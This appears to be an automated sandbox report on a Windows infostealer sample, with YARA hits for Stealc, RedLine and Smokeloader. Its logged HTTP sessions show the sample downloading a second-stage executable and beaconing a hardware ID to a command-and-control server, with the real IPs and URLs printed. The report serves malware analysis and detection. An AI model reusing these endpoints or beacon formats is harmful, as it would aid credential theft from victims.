                                                    Nov 26, 2024 22:47:12.574251890 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.574331045 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.574373960 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.576735973 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.576792955 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.577739954 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.577796936 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.577862024 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.577908993 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.580409050 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.580451965 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.580529928 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.580574036 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.583096027 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.583153963 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.583184004 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.583228111 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.585702896 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.585750103 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.585807085 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.585846901 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.588231087 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.588279963 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.588372946 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.588413954 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.590732098 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.590780020 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.590848923 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.590888977 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.593233109 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.593280077 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.593331099 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.593370914 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.595706940 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.595778942 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.595809937 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.595845938 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.598189116 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.598242044 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.598351955 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.598393917 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.600430012 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.600478888 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.600552082 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.600593090 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.602771997 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.602817059 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.602854967 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.602895021 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.605098963 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.605145931 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.605175018 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.605211973 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.607384920 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.607439995 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.607476950 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.607517958 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.609566927 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.609616041 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.609679937 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.609720945 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.611833096 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.611879110 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.611937046 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.611979961 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.614020109 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.614062071 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.614187956 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.614224911 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.616194010 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.616240025 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.616271973 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.616316080 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.618357897 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.618401051 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.618486881 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.618527889 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.620501995 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.620544910 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.620629072 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.620671034 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.622636080 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.622683048 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.622742891 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.622783899 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.624748945 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.624819994 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.624849081 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.624890089 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.626874924 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.626923084 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.626955032 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.626993895 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.628990889 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.629036903 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.629091024 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.629129887 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.631097078 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.631145000 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.631186008 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.631227016 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.633220911 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.633276939 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.633316994 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.633358955 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.635327101 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.635380983 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.635411978 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.635456085 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.637458086 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.637506962 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.637569904 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.637609959 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.639631033 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.639676094 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.639729977 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.639769077 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.641678095 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.641726971 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.641789913 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.641834021 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.643800974 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.643843889 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.643901110 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.643943071 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.645930052 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.645976067 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.646044016 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.646085024 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.648049116 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.648096085 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.648149967 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.648190022 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.650142908 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.650191069 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.650302887 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.650345087 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.652242899 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.652292013 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.652460098 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.652502060 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.654347897 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.654391050 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.654453993 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.654498100 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.656481028 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.656528950 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.656558990 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.656599998 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.658601046 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.658643007 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.658668041 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.658711910 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.660681009 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.660726070 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.660787106 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.660826921 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.662810087 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.662856102 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.662949085 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.662991047 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.664928913 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.664977074 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.665009975 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.665045023 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.666997910 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.667049885 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.667099953 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.667145014 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:17.061640978 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:17.061717033 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:27.464905024 CET4973880192.168.2.492.255.57.88
                                                    Nov 26, 2024 22:47:27.585026979 CET804973892.255.57.88192.168.2.4
                                                    Nov 26, 2024 22:47:27.585119009 CET4973880192.168.2.492.255.57.88
                                                    Nov 26, 2024 22:47:27.585395098 CET4973880192.168.2.492.255.57.88
                                                    Nov 26, 2024 22:47:27.705252886 CET804973892.255.57.88192.168.2.4
                                                    Nov 26, 2024 22:47:28.971765995 CET804973892.255.57.88192.168.2.4
                                                    Nov 26, 2024 22:47:28.972518921 CET4973880192.168.2.492.255.57.88
                                                    Nov 26, 2024 22:47:28.978765965 CET4973880192.168.2.492.255.57.88
                                                    Nov 26, 2024 22:47:29.098706961 CET804973892.255.57.88192.168.2.4
                                                    Nov 26, 2024 22:47:29.433871984 CET804973892.255.57.88192.168.2.4
                                                    Nov 26, 2024 22:47:29.434016943 CET4973880192.168.2.492.255.57.88
                                                    Nov 26, 2024 22:47:34.439394951 CET804973892.255.57.88192.168.2.4
                                                    Nov 26, 2024 22:47:34.439479113 CET4973880192.168.2.492.255.57.88
                                                    Nov 26, 2024 22:47:58.544413090 CET4973880192.168.2.492.255.57.88
                                                    Nov 26, 2024 22:48:57.934643984 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:48:58.246638060 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:48:58.855804920 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:49:00.058859110 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:49:02.621380091 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:49:07.433830976 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:49:17.084469080 CET4973180192.168.2.4176.113.115.37
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 26, 2024 22:47:07.973640919 CET | 54980 | 53 | 192.168.2.4 | 1.1.1.1
Nov 26, 2024 22:47:08.155407906 CET | 53 | 54980 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 26, 2024 22:47:07.973640919 CET | 192.168.2.4 | 1.1.1.1 | 0x38e | Standard query (0) | post-to-me.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 26, 2024 22:47:08.155407906 CET | 1.1.1.1 | 192.168.2.4 | 0x38e | No error (0) | post-to-me.com | | 172.67.179.207 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 22:47:08.155407906 CET | 1.1.1.1 | 192.168.2.4 | 0x38e | No error (0) | post-to-me.com | | 104.21.56.70 | A (IP address) | IN (0x0001) | false
                                                    • post-to-me.com
                                                    • 176.113.115.37
                                                    • 92.255.57.88
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 176.113.115.37 | 80 | 7356 | C:\Users\user\Desktop\6X4BIzTTBR.exe

Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 22:47:10.468208075 CET | 85 | OUT | GET /ScreenUpdateSync.exe HTTP/1.1
    User-Agent: ShareScreen
    Host: 176.113.115.37
Nov 26, 2024 22:47:11.804481030 CET | 1236 | IN | HTTP/1.1 200 OK
    Date: Tue, 26 Nov 2024 21:47:11 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Last-Modified: Tue, 26 Nov 2024 21:45:02 GMT
    ETag: "45e00-627d7c2f13cde"
    Accept-Ranges: bytes
    Content-Length: 286208
    Content-Type: application/x-msdos-program


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49738 | 92.255.57.88 | 80 | 7532 | C:\Users\user\AppData\Local\Temp\ED60.tmp.exe

Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 22:47:27.585395098 CET | 87 | OUT | GET / HTTP/1.1
    Host: 92.255.57.88
    Connection: Keep-Alive
    Cache-Control: no-cache
Nov 26, 2024 22:47:28.971765995 CET | 203 | IN | HTTP/1.1 200 OK
    Date: Tue, 26 Nov 2024 21:47:28 GMT
    Server: Apache/2.4.58 (Ubuntu)
    Content-Length: 0
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
Nov 26, 2024 22:47:28.978765965 CET | 415 | OUT | POST /7bbacc20a3bd2eb5.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----IJKFHDBKFCAAECBFIDHJ
    Host: 92.255.57.88
    Content-Length: 216
    Connection: Keep-Alive
    Cache-Control: no-cache
                                                    Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 30 32 46 43 31 36 35 32 39 30 36 31 34 33 37 37 38 38 36 35 34 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 35 35 31 34 38 38 34 31 31 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 2d 2d 0d 0a
Data Ascii (line breaks restored from the CRLFs in the raw bytes):
    ------IJKFHDBKFCAAECBFIDHJ
    Content-Disposition: form-data; name="hwid"

    102FC16529061437788654
    ------IJKFHDBKFCAAECBFIDHJ
    Content-Disposition: form-data; name="build"

    551488411
    ------IJKFHDBKFCAAECBFIDHJ--
Nov 26, 2024 22:47:29.433871984 CET | 210 | IN | HTTP/1.1 200 OK
                                                    Date: Tue, 26 Nov 2024 21:47:29 GMT
                                                    Server: Apache/2.4.58 (Ubuntu)
                                                    Content-Length: 8
                                                    Keep-Alive: timeout=5, max=99
                                                    Connection: Keep-Alive
                                                    Content-Type: text/html; charset=UTF-8
                                                    Data Raw: 59 6d 78 76 59 32 73 3d
                                                    Data Ascii: YmxvY2s=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 172.67.179.207 | 443 | 7356 | C:\Users\user\Desktop\6X4BIzTTBR.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-26 21:47:09 UTC | 90 | OUT | GET /track_prt.php?sub=0&cc=DE HTTP/1.1
    User-Agent: ShareScreen
    Host: post-to-me.com
2024-11-26 21:47:10 UTC | 780 | IN | HTTP/1.1 200 OK
    Date: Tue, 26 Nov 2024 21:47:10 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/5.4.16
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JaVAHyAaPznb7RC2EtTwjWwYljh4e8COwhZO4dEL1TLU%2BqNiOp%2FFcCEhuFsKgq9qWftb2f3wBmi%2FvLnTIKlroHGs387xMvmtKH%2FKNw%2FlXzFG7nHVOmzrcVyop4RM%2B4oaAA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8e8d134a3f5f7ce4-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1808&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4208&recv_bytes=728&delivery_rate=165307&cwnd=223&unsent_bytes=0&cid=0e7483b1062c442f&ts=718&x=0"
2024-11-26 21:47:10 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
    Data Ascii: 2ok
2024-11-26 21:47:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0



Target ID: 0
Start time: 16:46:55
Start date: 26/11/2024
Path: C:\Users\user\Desktop\6X4BIzTTBR.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\6X4BIzTTBR.exe"
Imagebase: 0x400000
File size: 413'184 bytes
MD5 hash: 5A45CFE0B266362B482CACE7205C2C32
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4091760416.0000000002C0D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation: low
Has exited: false

Target ID: 1
Start time: 16:47:11
Start date: 26/11/2024
Path: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\ED60.tmp.exe"
Imagebase: 0x400000
File size: 286'208 bytes
MD5 hash: A969307FDB2862755469583A5D9BEA48
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000001.00000002.2250272597.0000000002D6C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000003.1957434387.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2250290445.0000000002D8A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 34%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 7
Start time: 16:47:30
Start date: 26/11/2024
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 7532 -s 1288
Imagebase: 0x990000
File size: 483'680 bytes
MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true


                                                      Execution Graph

Execution Coverage: 2.1%
Dynamic/Decrypted Code Coverage: 3.8%
Signature Coverage: 5.8%
Total number of Nodes: 739
Total number of Limit Nodes: 22
___BuildCatchObject 64229->64230 64231 43ca1b 64230->64231 64233 43ca54 64230->64233 64247 42ead9 20 API calls __dosmaperr 64231->64247 64240 43cfdb 64233->64240 64234 43ca20 64248 42a5ad 26 API calls _Deallocate 64234->64248 64239 43ca2a std::_Locinfo::_Locinfo_dtor 64239->64223 64250 43f951 64240->64250 64243 43ca78 64249 43caa1 LeaveCriticalSection __wsopen_s 64243->64249 64246 43347a _free 20 API calls 64246->64243 64247->64234 64248->64239 64249->64239 64251 43f974 64250->64251 64252 43f95d 64250->64252 64253 43f993 64251->64253 64254 43f97c 64251->64254 64320 42ead9 20 API calls __dosmaperr 64252->64320 64324 434fba 10 API calls 2 library calls 64253->64324 64322 42ead9 20 API calls __dosmaperr 64254->64322 64258 43f962 64321 42a5ad 26 API calls _Deallocate 64258->64321 64260 43f981 64323 42a5ad 26 API calls _Deallocate 64260->64323 64261 43f99a MultiByteToWideChar 64263 43f9c9 64261->64263 64264 43f9b9 GetLastError 64261->64264 64326 4336b7 21 API calls 3 library calls 64263->64326 64325 42eaa3 20 API calls __dosmaperr 64264->64325 64267 43f9d1 64269 43f9f9 64267->64269 64270 43f9d8 MultiByteToWideChar 64267->64270 64268 43cff1 64268->64243 64274 43d04c 64268->64274 64272 43347a _free 20 API calls 64269->64272 64270->64269 64271 43f9ed GetLastError 64270->64271 64327 42eaa3 20 API calls __dosmaperr 64271->64327 64272->64268 64275 43d069 64274->64275 64276 43d097 64275->64276 64277 43d07e 64275->64277 64328 43978e 64276->64328 64342 42eac6 20 API calls __dosmaperr 64277->64342 64280 43d09c 64281 43d0a5 64280->64281 64282 43d0bc 64280->64282 64344 42eac6 20 API calls __dosmaperr 64281->64344 64341 43cd1a CreateFileW 64282->64341 64286 43d0aa 64345 42ead9 20 API calls __dosmaperr 64286->64345 64287 43d019 64287->64246 64289 43d172 GetFileType 64291 43d1c4 64289->64291 64292 43d17d GetLastError 64289->64292 64290 43d0f5 64290->64289 64294 43d147 GetLastError 64290->64294 64346 43cd1a CreateFileW 64290->64346 64350 4396d7 21 API calls 2 library calls 64291->64350 
64348 42eaa3 20 API calls __dosmaperr 64292->64348 64293 43d083 64343 42ead9 20 API calls __dosmaperr 64293->64343 64347 42eaa3 20 API calls __dosmaperr 64294->64347 64297 43d18b CloseHandle 64297->64293 64299 43d1b4 64297->64299 64349 42ead9 20 API calls __dosmaperr 64299->64349 64301 43d13a 64301->64289 64301->64294 64302 43d1e5 64304 43d231 64302->64304 64351 43cf2b 169 API calls 3 library calls 64302->64351 64309 43d25e 64304->64309 64352 43cacd 167 API calls 4 library calls 64304->64352 64305 43d1b9 64305->64293 64308 43d257 64308->64309 64310 43d26f 64308->64310 64353 4335dd 29 API calls 2 library calls 64309->64353 64310->64287 64312 43d2ed CloseHandle 64310->64312 64354 43cd1a CreateFileW 64312->64354 64314 43d318 64315 43d322 GetLastError 64314->64315 64319 43d267 64314->64319 64355 42eaa3 20 API calls __dosmaperr 64315->64355 64317 43d32e 64356 4398a0 21 API calls 2 library calls 64317->64356 64319->64287 64320->64258 64321->64268 64322->64260 64323->64268 64324->64261 64325->64268 64326->64267 64327->64269 64329 43979a ___BuildCatchObject 64328->64329 64357 42e3fd EnterCriticalSection 64329->64357 64331 4397c6 64361 43956d 21 API calls 3 library calls 64331->64361 64332 4397a1 64332->64331 64336 439834 EnterCriticalSection 64332->64336 64338 4397e8 64332->64338 64334 439811 std::_Locinfo::_Locinfo_dtor 64334->64280 64336->64338 64339 439841 LeaveCriticalSection 64336->64339 64337 4397cb 64337->64338 64362 4396b4 EnterCriticalSection 64337->64362 64358 439897 64338->64358 64339->64332 64341->64290 64342->64293 64343->64287 